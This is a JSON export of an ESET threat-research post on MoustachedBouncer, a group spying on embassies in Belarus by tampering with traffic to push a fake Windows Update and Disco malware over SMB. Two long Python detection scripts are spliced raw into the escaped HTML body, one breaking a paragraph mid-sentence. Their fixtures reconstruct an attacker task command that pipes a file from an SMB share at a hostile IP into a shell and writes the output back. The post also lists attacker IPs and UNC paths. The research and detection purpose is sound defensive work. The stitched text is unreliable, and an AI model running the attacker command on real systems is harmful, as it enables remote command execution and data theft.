{"id":8429,"date":"2023-08-10T12:00:00","date_gmt":"2023-08-10T09:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/2023\/08\/10\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/"},"modified":"2023-08-10T12:00:00","modified_gmt":"2023-08-10T09:00:00","slug":"moustachedbouncer-espionage-against-foreign-diplomats-in-belarus","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2023\/08\/10\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/","title":{"rendered":"MoustachedBouncer: Espionage against foreign diplomats in Belarus"},"content":{"rendered":"<p>MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in this blogpost. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform <a href=\"https:\/\/attack.mitre.org\/versions\/v11\/techniques\/T1557\/\"><em>adversary-in-the-middle<\/em><\/a> (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. 
The group uses two separate toolsets that we have named NightClub and Disco.<\/p>\n<blockquote>\n<p><strong>Key points of this report:<\/strong><\/p>\n<ul>\n<li><em>MoustachedBouncer has been operating since at least 2014.<\/em><\/li>\n<li><em>We assess with medium confidence that they are aligned with Belarus&#8217;s interests.<\/em><\/li>\n<li><em>MoustachedBouncer specializes in the espionage of foreign embassies in Belarus.<\/em><\/li>\n<li><em>MoustachedBouncer has used the adversary-in-the-middle technique since 2020 to redirect captive portal checks to a C&amp;C server and deliver malware plugins via SMB shares.<\/em><\/li>\n<li><em>We believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.<\/em><\/li>\n<li><em>We assess with low confidence that MoustachedBouncer is closely cooperating with Winter Vivern, another group targeting European diplomats but using different TTPs.<\/em><\/li>\n<li><em>Since 2014, the group has been operating a malware framework that we have named NightClub. It uses the SMTP and IMAP (email) protocols for C&amp;C communications.<\/em><\/li>\n<li><em>Starting in 2020, the group has been using, in parallel, a second malware framework we have named Disco.<\/em><\/li>\n<li><em>Both NightClub and Disco support additional spying plugins including a screenshotter, an audio recorder, and a file stealer.<\/em><\/li>\n<\/ul>\n<\/blockquote>\n<blockquote>\n<p>The group&#8217;s intricate tactics, techniques and procedures were also discussed on the ESET Research Podcast. Just press play to learn more from ESET&#8217;s Director of Threat Research Jean-Ian Boutin and ESET Distinguished Researcher Aryeh Goretsky. <\/p>\n<\/p>\n<\/blockquote>\n<h2>Victimology<\/h2>\n<p>According to ESET telemetry, the group targets foreign embassies in Belarus, and we have identified four different countries whose embassy staff have been targeted: two from Europe, one from South Asia, and one from Africa. 
The key dates are shown in Figure 1.<\/p>\n<figure><img decoding=\"async\" alt=\"MoustachedBouncer_Timeline_edited\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/moustachedbouncer-timeline-edited.png\" title=\"Figure 1. Timeline of MoustachedBouncer activities\" width=\"\"><figcaption>\n<p><a><\/a><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">1<\/span><\/em><span lang=\"EN-US\"><em>. Timeline of MoustachedBouncer activities<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h2>Attribution<\/h2>\n<p>While we track MoustachedBouncer as a separate group, we have found elements that make us assess with low confidence that they are closely collaborating with another group known as Winter Vivern. The latter was <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\"><em>discovered<\/em><\/a> in 2021 and is still active as of 2023. In March 2023, Winter Vivern used a known XSS vulnerability (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-27926\"><em>CVE-2022-27926<\/em><\/a>) in the Zimbra mail portal in order to steal webmail credentials of diplomats of several European countries. This campaign was publicly disclosed by <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability\"><em>Proofpoint<\/em><\/a> researchers.<\/p>\n<p>MoustachedBouncer\u2019s activity spans from 2014 to 2022 and the TTPs of the group have evolved over time. For example, we have first seen them use AitM attacks only in 2020. However, the targeted vertical has stayed the same.<\/p>\n<p>Table 1 shows the characteristics of each campaign. Given these elements, we assess with high confidence that they are all linked to MoustachedBouncer.<\/p>\n<p><em><a><\/a><span lang=\"EN-US\">Table <\/span><span><span lang=\"EN-US\">1<\/span><\/span><\/em><span lang=\"EN-US\"><em>. 
Connections between the MoustachedBouncer campaigns<\/em><\/span><\/p>\n<\/p>\n<div align=\"center\">\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">VirusTotal<br \/>(2014)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim A (2017)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim B<br \/><span><br \/>\n<\/span>(2020-2022)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim C<br \/>(2020-2022)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim D<br \/>(2021-2022)<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">NightClub implant<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">NightClub plugins<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td 
width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Disco implant<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">SharpDisco dropper<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Compromise via AitM<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span 
lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Malware delivery via AitM on SMB shares<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Victims: foreign embassies in Belarus<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">? <\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div align=\"center\">\n<\/div>\n<h2>Compromise vector: AitM<\/h2>\n<p>In this section, we detail the initial access for Disco. We don\u2019t yet know the initial access method MoustachedBouncer uses to install NightClub.<\/p>\n<h3>Fake Windows Update<\/h3>\n<p>To compromise their targets, MoustachedBouncer operators tamper with their victims\u2019 internet access, probably at the ISP level, to make Windows believe it\u2019s behind a captive portal. 
<a href=\"https:\/\/docs.microsoft.com\/en-us\/troubleshoot\/windows-client\/networking\/internet-explorer-edge-open-connect-corporate-public-network\"><em>Windows 10 checks<\/em><\/a> whether it\u2019s able to access the internet with an HTTP request to <span>http:\/\/www.msftconnecttest.com\/connecttest.txt<\/span>. If the response body is not <span>Microsoft Connect Test<\/span>, a browser window is opened to <span>http:\/\/www.msftconnecttest.com\/redirect<\/span>. For IP ranges targeted by MoustachedBouncer, the network traffic is tampered with at the ISP level, and the latter URL redirects to a seemingly legitimate, but fake, Windows Update URL, <span>http:\/\/updates.microsoft[.]com\/<\/span>. Hence, the fake Windows Update page is displayed to a potential victim as soon as the machine connects to the network. The fake update page is shown in Figure 2. The text we observed is in Russian, most likely because that is the main language used in Belarus, but it is possible that versions in other languages exist. The page indicates that there are critical system security updates that must be installed.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Fake Windows Update page\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/picture1.png\" title=\"Figure 2. Fake Windows Update page\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">2<\/span><\/em><span lang=\"EN-US\"><em>. Fake Windows Update page<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Note that it is using unencrypted HTTP and not HTTPS, and that the <span>updates.microsoft[.]com<\/span> subdomain does not exist on Microsoft\u2019s nameservers, so it does not resolve on the open internet. During the attack, this domain resolved to <span>5.45.121[.]106<\/span> on the target\u2019s machine. This IP address is used for parking domains and is unrelated to Microsoft. 
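The NCSI probe described above doubles as a cheap tripwire: a host can issue the same request itself, refuse to accept anything but the expected body, and confirm that the hostnames used by the fake update page still fail to resolve. The following is an added example written for this page, not code from ESET or from the MoustachedBouncer toolset. The captured responses exercised in its tests are constructed; the hostname list is taken from the report's IOCs (updates.microsoft[.]com here and windows.system.update[.]com from the Disco dropper section), and the live probe needs real network access.

```python
"""Tripwire for the NCSI captive-portal probe that MoustachedBouncer abuses.

Windows decides it is behind a captive portal when the GET for
http://www.msftconnecttest.com/connecttest.txt does not return the exact body
"Microsoft Connect Test"; it then opens a browser on /redirect, which on a
tampered path lands on the fake Windows Update page. The verdict logic below
reproduces that rule on a captured response so it can be tested offline; the
live probe issues the real request and refuses to follow redirects, and the
resolver check confirms the fake update hostnames still NXDOMAIN.
"""
import socket
import urllib.error
import urllib.request
from dataclasses import dataclass, field

NCSI_URL = "http://www.msftconnecttest.com/connecttest.txt"
NCSI_BODY = b"Microsoft Connect Test"
# Hostnames from the report that only resolve while the AitM injection is active.
FAKE_UPDATE_HOSTS = ("updates.microsoft.com", "windows.system.update.com")


@dataclass
class ProbeResult:
    status: int
    headers: dict
    body: bytes
    findings: list = field(default_factory=list)

    @property
    def tampered(self) -> bool:
        return bool(self.findings)


def evaluate_ncsi(status: int, headers: dict, body: bytes) -> ProbeResult:
    """Apply the NCSI acceptance rule and record every deviation from it."""
    result = ProbeResult(status, {k.lower(): v for k, v in headers.items()}, body)
    if status != 200:
        result.findings.append(f"unexpected status {status}")
    if "location" in result.headers:
        result.findings.append(f"redirect to {result.headers['location']}")
    if body.strip() != NCSI_BODY:
        result.findings.append(f"body is not the NCSI marker: {body[:40]!r}")
    return result


def check_fake_update_hosts(resolver=socket.gethostbyname) -> list:
    """Return (host, ip) for every fake hostname that resolves; clean DNS gives []."""
    resolved = []
    for host in FAKE_UPDATE_HOSTS:
        try:
            resolved.append((host, resolver(host)))
        except OSError:  # socket.gaierror (NXDOMAIN) is a subclass of OSError
            pass
    return resolved


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx answers as errors instead of silently following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_probe(timeout: float = 5.0) -> ProbeResult:
    """Issue the real NCSI request (network access required)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(NCSI_URL, timeout=timeout) as resp:
            return evaluate_ncsi(resp.status, dict(resp.headers), resp.read())
    except urllib.error.HTTPError as err:  # raised for the 3xx we refused to follow
        return evaluate_ncsi(err.code, dict(err.headers), err.read())


if __name__ == "__main__":
    probe = live_probe()
    print("NCSI probe:", "TAMPERED" if probe.tampered else "clean", probe.findings)
    print("fake update hosts that resolve:", check_fake_update_hosts())
```

Run it from the suspect network segment; a clean path prints a clean probe and an empty host list, while the injection described in the report shows up as a redirect or a foreign body plus a parking-range answer for the fake hostnames. Because the redirect is refused, the script never fetches the fake update page itself.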
Although this is an internet-routable IP address, traffic to this IP never reaches the internet while the AitM attack is ongoing. Both the DNS resolutions and the HTTP replies were injected in transit, probably at the ISP level.<\/p>\n<p>An important point is that the adversary-in-the-middle (AitM) technique only occurs against a few selected organizations (perhaps just embassies), not countrywide. It is not possible to reproduce the redirection by simply exiting from a random IP address in Belarus.<\/p>\n<h3>Malware delivery<\/h3>\n<p>The HTML page, shown in Figure 2, loads JavaScript code from <span>http:\/\/updates.microsoft[.]com\/jdrop.js<\/span>. This script first calls <span>setTimeout<\/span> to execute the function <span>jdrop<\/span> one second after the page has loaded. That function (see Figure 3) displays a modal window with a button named <span>\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f<\/span> (translation: Get updates).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. jdrop function\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/jdrop.png\" title=\"Figure 3. jdrop function\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">3<\/span><span lang=\"EN-US\">. <\/span><span><span lang=\"EN-US\">jdrop<\/span><\/span><\/em><span lang=\"EN-US\"><em> function<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>A click on the button executes the <span>update<\/span> function, shown in Figure 4.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. update function\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/update-js.png\" title=\"Figure 4. update function\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">4<\/span><span lang=\"EN-US\">. 
<\/span><span><span lang=\"EN-US\">update<\/span><\/span><\/em><span lang=\"EN-US\"><em> function<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>This function triggers the download of a fake Windows Update installer from the legitimate-seeming URL <span>http:\/\/updates.microsoft[.]com\/MicrosoftUpdate845255.zip<\/span>. It also displays some instructions to install the update: <span>\u0414\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 &#8220;MicrosoftUpdate845255.msi&#8221;<\/span>. (translation: To install updates, download and run &#8220;MicrosoftUpdate845255.msi&#8221;).<\/p>\n<p>We were unable to retrieve the downloaded <span>MicrosoftUpdate845255.zip<\/span> file, but our telemetry shows it contains a malicious executable named <span>MicrosoftUpdate845255.exe<\/span>.<\/p>\n<p>That executable, written in Go, creates a scheduled task that executes <span>\\\\35.214.56[.]2\\OfficeBroker\\OfficeBroker.exe<\/span> every minute. As the UNC path suggests, it fetches the executable via SMB from <span>35.214.56[.]2<\/span>. This IP address belongs to a Google Cloud customer, but just like the HTTP server, we believe that SMB replies are injected on the fly via AitM and that the attackers don\u2019t control the actual internet-routable IP address.<\/p>\n<p>We have also observed the following SMB servers, intercepted via AitM:<\/p>\n<ul>\n<li><span>\\\\209.19.37[.]184<\/span><\/li>\n<li><span>\\\\38.9.8[.]78<\/span><\/li>\n<li><span>\\\\59.6.8[.]25<\/span><\/li>\n<\/ul>\n<p>We have observed this behavior in two separate ISP networks: Unitary Enterprise A1 and Beltelecom. This suggests that those ISPs may not provide full data confidentiality and integrity. 
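The persistence described above is unusual enough to hunt for directly: a scheduled task whose action is a UNC path to a bare IP address, repeating every minute. The SharpDisco tasks described later in the report use the same building block, reading a file from an SMB share and piping it into a renamed cmd.exe. Task definitions are plain XML (the files under C:\Windows\System32\Tasks, or the output of `schtasks /query /xml`), so both patterns can be flagged without the Task Scheduler API. The following is an added example written for this page, not ESET's tooling; the three task definitions are constructed to mirror the report's description (the report shows the real SharpDisco tasks only as an image, so that command line is a reconstruction, and the IP addresses are the defanged IOCs written out).

```python
"""Hunt scheduled tasks that run or feed from an SMB share addressed by IP.

Flags three traits of the MoustachedBouncer tasks: an Exec command that is a UNC
path to an IPv4 literal, a command line that reads from such a path, and content
piped into a shell. A one-minute repetition interval is reported only when one of
those traits is present, so ordinary frequent tasks are not listed.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# A UNC path whose server part is an IPv4 literal, e.g. \\1.2.3.4\share\file.exe
UNC_IP = re.compile(r"""\\\\(\d{1,3}(?:\.\d{1,3}){3})\\[^\s"'|&>]*""")
PIPED_INTO_CMD = re.compile(r"\|\s*\S*cmd", re.I)   # "| cmd.exe", "| WINCMDA.EXE", ...


@dataclass
class Finding:
    task: str
    reason: str
    detail: str


def repetition_seconds(root):
    """Shortest trigger repetition interval in seconds (ISO 8601 PTnHnMnS), or None."""
    best = None
    for node in root.iterfind(".//t:Triggers//t:Repetition/t:Interval", NS):
        m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", node.text or "")
        if m:
            h, mi, s = (int(x) if x else 0 for x in m.groups())
            secs = h * 3600 + mi * 60 + s
            best = secs if best is None or secs < best else best
    return best


def analyse_task(xml_text, name="<unnamed>"):
    """Return a list of Finding for one task definition (str or bytes)."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_ in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = exec_.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_.findtext("t:Arguments", default="", namespaces=NS).strip()
        unc_in_args = UNC_IP.search(args)
        if UNC_IP.match(cmd):
            findings.append(Finding(name, "executable fetched from SMB share by IP", cmd))
        elif unc_in_args:
            findings.append(Finding(name, "command line references SMB share by IP",
                                    unc_in_args.group(0)))
        if PIPED_INTO_CMD.search(args):
            findings.append(Finding(name, "share content piped into a shell", args))
    interval = repetition_seconds(root)
    if findings and interval is not None and interval <= 60:
        findings.append(Finding(name, "repeats at one-minute cadence", f"{interval}s"))
    return findings


def analyse_task_dir(folder=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store; files are UTF-16 with BOM, so pass raw bytes."""
    results = []
    for path in Path(folder).rglob("*"):
        if path.is_file():
            try:
                results += analyse_task(path.read_bytes(), path.name)
            except ET.ParseError:
                pass
    return results


# Constructed samples modelled on the tasks described in the report (not real captures).
DISCO_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2022-01-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT1M</Interval></Repetition><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>\\35.214.56.2\OfficeBroker\OfficeBroker.exe</Command></Exec></Actions>
</Task>"""
SHARPDISCO_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2020-01-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT1M</Interval></Repetition><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\cmd.exe</Command>
    <Arguments>/c type \\24.9.51.94\EDGEUPDATE\EDGEAIN | WINCMDA.EXE &gt; \\24.9.51.94\EDGEUPDATE\EDGEAOUT</Arguments></Exec></Actions>
</Task>"""
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2022-01-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT1H</Interval></Repetition></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%SystemRoot%\System32\svchost.exe</Command>
    <Arguments>-k netsvcs -p</Arguments></Exec></Actions>
</Task>"""
```

Matching on an IP literal rather than on a hostname is deliberate: the shares in this campaign are never named, because the replies are injected in transit and the operators have no DNS to point at. A share referenced by NetBIOS or DNS name is worth reviewing too, but it is far more common in legitimate deployment tooling.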
We strongly recommend that foreign organizations in Belarus use an end-to-end encrypted VPN tunnel, ideally out-of-band (i.e., not from the endpoint), providing internet connectivity from a trusted network.<\/p>\n<p>Figure 5 depicts our hypothesis about the compromise vector and the traffic interception.<\/p>\n<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. Compromise via AitM scenario\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/slide1.jpeg\" title=\"Figure 5. Compromise via AitM scenario\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">5<\/span><\/em><span lang=\"EN-US\"><em>. Compromise via AitM scenario<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h3>AitM \u2013 General thoughts<\/h3>\n<p>The AitM scenario reminds us of the Turla and StrongPity threat actors who have trojanized software installers on the fly at the ISP level. <\/p>\n<p>Usually, this initial access method is used by threat actors operating in their own country because it requires significant access inside the internet service providers, or their upstream providers. In many countries, security services are allowed to perform so-called \u201clawful interception\u201d using special devices installed on the ISPs\u2019 premises.<\/p>\n<p>In Russia, a law from 2014 requires ISPs to install devices called <a href=\"https:\/\/en.wikipedia.org\/wiki\/SORM\"><em>SORM-3<\/em><\/a> that enable the Federal Security Service (FSB) to <a href=\"https:\/\/www.csis.org\/analysis\/reference-note-russian-communications-surveillance\"><em>conduct targeted surveillance<\/em><\/a>. 
The devices have deep packet inspection (DPI) capabilities and were likely used by Turla in its <a href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2018\/01\/ESET_Turla_Mosquito.pdf\"><em>Mosquito campaign<\/em><\/a>.<\/p>\n<p>In 2018, the Citizen Lab revealed that DPI devices developed by the Canadian company Sandvine were used to modify HTTP traffic in Turkey and Egypt. In Turkey, the devices were allegedly used to redirect internet users to a malicious server when they tried to download certain Windows applications, which is in line with StrongPity activities. In Egypt, those devices were allegedly used to inject ads and cryptocurrency mining scripts in order to generate money.<\/p>\n<p>In 2020, a <a href=\"https:\/\/www.bloomberg.com\/news\/articles\/2020-08-28\/belarusian-officials-shut-down-internet-with-technology-made-by-u-s-firm\"><em>Bloomberg article<\/em><\/a> revealed that Belarus\u2019s National Traffic Exchange Center bought the same Sandvine DPI equipment, but according to a <a href=\"https:\/\/www.cyberscoop.com\/sandvine-belarus-contract-censorship-human-rights\/\"><em>Cyberscoop article<\/em><\/a> the contract was cancelled in September 2020.<\/p>\n<p>According to a <a href=\"https:\/\/www.amnesty.org\/en\/wp-content\/uploads\/2021\/05\/EUR4990452018ENGLISH.pdf\"><em>report by Amnesty International<\/em><\/a> published in 2021, \u201cUnder Belarusian law, all telecommunications providers in the country must make their hardware compatible with the SORM system\u201d. They also state that \u201cThe SORM system allows the authorities direct, remote-control access to all user communications and associated data without notifying the provider\u201d. 
We assess with low confidence that MoustachedBouncer uses this SORM system to conduct its operations.<\/p>\n<p>While the compromise of routers in order to conduct AitM on embassy networks cannot be fully ruled out, the presence of lawful interception capabilities in Belarus suggests the traffic mangling is happening at the ISP level rather than on the targets\u2019 routers.<\/p>\n<h2>Implants: NightClub and Disco<\/h2>\n<p>Since 2014, the malware families used by MoustachedBouncer have evolved, and a big change happened in 2020 when the group started to use AitM attacks. At the same time, it started to use much simpler tools developed in .NET and Go. In reference to NightClub, we named this new toolset Disco.<\/p>\n<p>MoustachedBouncer operates the two implant families in parallel, but on a given machine, only one is deployed at a time. We believe that Disco is used in conjunction with AitM attacks while NightClub is used for victims where traffic interception at the ISP level isn\u2019t possible because of a mitigation such as the use of an end-to-end encrypted VPN where internet traffic is routed outside of Belarus.<\/p>\n<h3>Disco<\/h3>\n<p>As mentioned in the previous section, a fake Windows Update page delivers the first stage (SHA-1: <span>E65EB4467DDB1C99B09AE87BA0A964C36BAB4C30<\/span>). This is a simple dropper written in Go that creates a scheduled task to execute <span>\\\\35.214.56[.]2\\OfficeBroker\\OfficeBroker.exe<\/span> every minute. <span>OfficeBroker.exe<\/span> is downloaded over the SMB protocol via an AitM attack. The dropper\u2019s main function is shown in Figure 6.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 6. Main function of the Go dropper\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-6.png\" title=\"Figure 6. Main function of the Go dropper\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">6<\/span><\/em><span lang=\"EN-US\"><em>. 
Main function of the Go dropper<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Finally, the dropper does a DNS query for <span>windows.system.update[.]com<\/span>. This domain does not exist, but the DNS request is probably intercepted via AitM and is likely a beacon to notify the operators that the machine has been successfully compromised.<\/p>\n<p>We were unable to retrieve the <span>OfficeBroker.exe<\/span> file, but it is very likely that it acts as a downloader, since we have observed further plugins being executed from SMB shares. The plugins are developed in Go and are rather simple because they mostly rely on external Go libraries. Table 2 summarizes the different plugins.<\/p>\n<p><em><a><\/a><span lang=\"EN-US\">Table <\/span><span><span lang=\"EN-US\">2<\/span><\/span><\/em><span lang=\"EN-US\"><em>. Go plugins used by MoustachedBouncer in 2021\u20132022<\/em><\/span><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"97%\">\n<tbody>\n<tr>\n<td width=\"62%\">\n<p><strong><span lang=\"EN-US\">Download URL \/ Path on disk<\/span><\/strong><\/p>\n<\/td>\n<td width=\"37%\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\\\209.19.37[.]184\\driverpack\\aact.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span 